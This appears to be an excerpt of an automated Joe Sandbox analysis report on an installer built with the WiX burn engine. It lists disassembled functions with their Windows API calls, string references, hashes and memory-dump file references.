                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastNameUser
                                                                                                                                                                                                                                                                            • String ID: Failed to get the user name.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2054405381-561454448
                                                                                                                                                                                                                                                                            • Opcode ID: ff2cc25f1dd210e556e654dc520f7847b0960c99560be4cba8f4acd99afd43d3
                                                                                                                                                                                                                                                                            • Instruction ID: f04d28e296b3a893eb6e65c0be31c52d8de888dab77003eab7d73f1d9b1c7401
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff2cc25f1dd210e556e654dc520f7847b0960c99560be4cba8f4acd99afd43d3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF1104B2A4032876DB20D6569C4AFAF72ACEB42B94F110155FD84F72C2E6A09D4486E0
                                                                                                                                                                                                                                                                            Function 009014C4 Relevance: 7.8, Strings: 6, Instructions: 315COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to check if "ALL" was set in IGNOREDEPENDENCIES., xrefs: 009015A3
                                                                                                                                                                                                                                                                            • Failed to add the package provider key "%ls" to the planned list., xrefs: 0090186D
                                                                                                                                                                                                                                                                            • Failed to check the dictionary of ignored dependents., xrefs: 00901711
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 0090156F, 0090187F
                                                                                                                                                                                                                                                                            • ALL, xrefs: 00901581
                                                                                                                                                                                                                                                                            • Failed to build the list of ignored dependents., xrefs: 0090155D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ALL$Failed to add the package provider key "%ls" to the planned list.$Failed to build the list of ignored dependents.$Failed to check if "ALL" was set in IGNOREDEPENDENCIES.$Failed to check the dictionary of ignored dependents.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-71972248
                                                                                                                                                                                                                                                                            • Opcode ID: c22ea1186e31a39b0dfa782114d9893761b37441b77986feab193f499ae68ce8
                                                                                                                                                                                                                                                                            • Instruction ID: 10509e33962427b5b7a58f1e602fa61802eb6e9e33cad22b5738b25d8738d215
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c22ea1186e31a39b0dfa782114d9893761b37441b77986feab193f499ae68ce8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1C1A870900704DFEB24CFA5C885FAAB7F9FF98315F14852EE50AAB2A1D7719981CB10
                                                                                                                                                                                                                                                                            Function 0094BA41 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0000000C), ref: 0094BA96
                                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,0000000C,?), ref: 0094BAA8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 0094BA7F
                                                                                                                                                                                                                                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0094BAF3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                                                                                                                            • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
                                                                                                                                                                                                                                                                            • API String ID: 1772835396-395410266
                                                                                                                                                                                                                                                                            • Opcode ID: 27c07312173726553f114cc58a77f45219460a715064a85db1e080dc6b8e5745
                                                                                                                                                                                                                                                                            • Instruction ID: e744d9dc6c4d9727fdb5e30f0955b0025552c9bdd36780a258a683f6ff358002
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27c07312173726553f114cc58a77f45219460a715064a85db1e080dc6b8e5745
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921DAA6900128AADB20DF999C05FBFB3FDEB4D711F04455AB945D6180E638AE80D771
                                                                                                                                                                                                                                                                            Function 009198F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00919898,00000000,00000003), ref: 00919910
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00919898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?), ref: 0091991A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ChangeConfigErrorLastService
                                                                                                                                                                                                                                                                            • String ID: Failed to set service start type.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1456623077-1893245463
                                                                                                                                                                                                                                                                            • Opcode ID: 2f61c330d33e342ed0ca2914adaddd65a5eb1989947dc535590cf8f5ad02b777
                                                                                                                                                                                                                                                                            • Instruction ID: 91aec7be0e74811413bd2613f445d06b3a5224b4e1d679f875f089b2d35fac4d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f61c330d33e342ed0ca2914adaddd65a5eb1989947dc535590cf8f5ad02b777
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6F02473B4413833D620255A5C09FAB7E1CEB43BB0F010329BE28FB2D1E5218C0092F1
                                                                                                                                                                                                                                                                            Function 0094C535 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0094C546
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 0094C561
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 401686933-2746444292
                                                                                                                                                                                                                                                                            • Opcode ID: ec0b4024724107b42488d00acd85ea3e3a5b8456cb7e26b255f5ce8ba26e84e4
                                                                                                                                                                                                                                                                            • Instruction ID: 5fa0bfbeaad10dc8356bf2b60e75ff0ffa6d26bfa6a0d9ba574d1e69666320f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec0b4024724107b42488d00acd85ea3e3a5b8456cb7e26b255f5ce8ba26e84e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99018476A141096BDB14DE29DC05FEE7BADAFC4324F08C224BD59D7154E634E9058690
                                                                                                                                                                                                                                                                            Function 008FECE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 008E6313
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: GetLastError.KERNEL32(?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 008E6321
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FED2D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed create acquisition folder., xrefs: 008FED04
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FED16
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateDecryptDirectoryErrorFileLast
                                                                                                                                                                                                                                                                            • String ID: Failed create acquisition folder.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4153065963-4185204549
                                                                                                                                                                                                                                                                            • Opcode ID: 12b8a6edb2a3764869f002053d50403b218ad5dfd61dd991f2203a171322ee6a
                                                                                                                                                                                                                                                                            • Instruction ID: 9e71649746a8e5be057c890364ca1c99fa6086089127caa0267e989fa60f3934
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12b8a6edb2a3764869f002053d50403b218ad5dfd61dd991f2203a171322ee6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BE0D83278421977D62166AF9C0BF8AFE08FF62F61F000221F708E52E1D6E0782043E6
                                                                                                                                                                                                                                                                            Function 0092D3EE Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0092D4E6
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0092D4F0
                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0092D4FD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                            • Opcode ID: 17cb29c8d08ca5f6d9ac6a99d19611b153477d112f30597efb178c6a9041a8e4
                                                                                                                                                                                                                                                                            • Instruction ID: f6159e784ae030fdf471b5461506cdc7137891fc3f44bb7f54ce1d422bf24331
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17cb29c8d08ca5f6d9ac6a99d19611b153477d112f30597efb178c6a9041a8e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1731E37490522C9BCB21DF64E888B8CBBB8BF48310F5041EAF40CA72A5E7709F858F44
                                                                                                                                                                                                                                                                            Function 00939398 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,feclient.dll,?,00000008,?,?,00939393,0094E878,?,00000008,?,?,00938F96,00000000), ref: 009395C5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                            • String ID: feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 3997070919-3074931424
                                                                                                                                                                                                                                                                            • Opcode ID: 31bf46db9558701a69577d2349841426c57e76ffd47c434a175db78a369478e4
                                                                                                                                                                                                                                                                            • Instruction ID: 5b013f604c1f7e55d739c44518acccbc3a99b391eb108793dd90df56c5bfa15c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31bf46db9558701a69577d2349841426c57e76ffd47c434a175db78a369478e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB14A726106099FD715CF28C48AB657BE0FF45368F258658E8DACF2A1C379E992CF40
                                                                                                                                                                                                                                                                            Function 0093B493 Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B523: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0093B4C2,?), ref: 0093B5EF
                                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0093B4E6
                                                                                                                                                                                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0093B4F7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2114926846-0
                                                                                                                                                                                                                                                                            • Opcode ID: 679e3fc274e63d6c5a658a6119eccd34458fcfb8de732828b9da0d966a9d0a14
                                                                                                                                                                                                                                                                            • Instruction ID: 9f290eb92aa62702fdcaecc52bc696db34885a2d808feddfc2d5bc7d4abd01b7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 679e3fc274e63d6c5a658a6119eccd34458fcfb8de732828b9da0d966a9d0a14
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 461139B190021AABDF10DFA4DC85BAEB7FCFF19304F500829A245A6181D7709A44CB61
                                                                                                                                                                                                                                                                            Function 0094343B Relevance: 3.0, APIs: 2, Instructions: 43fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(008E6DEA,?,008E6DEA,008E6DEA,00000000), ref: 00943476
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00943482
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4908b6df04d7d4831a8e61f402631d5c1d6e9a938cd8212a9f9ad8598163c3ec
                                                                                                                                                                                                                                                                            • Instruction ID: 5e59145e2358dd5a08ee75ec675ac6d6c8ee49a498e34efcbfbba65616655f7e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4908b6df04d7d4831a8e61f402631d5c1d6e9a938cd8212a9f9ad8598163c3ec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E01F971600218ABDB10EF7AED89DAAB7ACEFC5329F004155F418D3150D6349E498B50
                                                                                                                                                                                                                                                                            Function 00927255 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0092726B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2f82090c67796e78f495023e665f9ace4ac8578033e5c50d1514fbbc728dbc9b
                                                                                                                                                                                                                                                                            • Instruction ID: ce0e162f9437a82321c5a6bcc7bc605f1ba6c892898e5755b903aaa310794d17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f82090c67796e78f495023e665f9ace4ac8578033e5c50d1514fbbc728dbc9b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D515FB2A19215CBDB25CF99E8817AABBF4FB48314F148869D809FB354D3749980DF50
                                                                                                                                                                                                                                                                            Function 0092C80C Relevance: 1.6, Strings: 1, Instructions: 385COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: a2131530d1aa22473d5814e3a03ea39e4c9fbe775a249ac6a1d5af087eb4d877
                                                                                                                                                                                                                                                                            • Instruction ID: 73afa97c82414ee74b14b9f6bb8a5aee718b79b24848299c9f1250ac5165ebf6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2131530d1aa22473d5814e3a03ea39e4c9fbe775a249ac6a1d5af087eb4d877
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8D103B4A0062A8FCB28CF68E58567EB7B5FF48310F24861DE5569B799D331AD81CB40
                                                                                                                                                                                                                                                                            Function 00931290 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
